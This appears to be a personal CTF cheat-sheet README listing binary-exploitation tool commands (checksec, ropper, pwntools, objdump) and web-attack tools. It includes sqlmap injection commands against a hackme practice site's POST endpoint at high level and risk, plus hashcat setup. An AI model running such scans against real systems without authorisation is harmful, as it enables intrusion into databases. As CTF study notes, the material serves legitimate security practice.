Skip to content

Latest commit

 

History

History
66 lines (52 loc) · 1.93 KB

README.md

File metadata and controls

66 lines (52 loc) · 1.93 KB

CTF-Solve

pwn

# check file type (ex: 32bit, 64bit
file binary

# check sec 
checksec --file=a.out 

ROP tools

# install ropper
pacman -S ropper
pacaur -S python-z3 python-pyvex-git  python-archinfo-git # if need semantic

Q&A

  • ropper semantic not found gadgets using --clear-cache

pwntools

debug

# show log
context.log_level ='debug'

# gdb
context.terminal = ['alacritty', '-e', 'sh', '-c']
gdb.attach(c)

GOT

  • find plt/got objdump -R binfile

Reference

web

  • SSRF

sqlmap

sqlmap -u "https://hackme.inndy.tw/gb/?mod=post" --method POST -p "content,title" --data "title=a&content=b"  
sqlmap -u "https://hackme.inndy.tw/gb/?mod=post" --method POST -p "content,title" --data "title=a&content=b" --level=3 --risk=3 # if above not working

XSStrike

other

hashcat insall

sudo pacman -S hashcat, opencl-mesa # or opencl-nvidia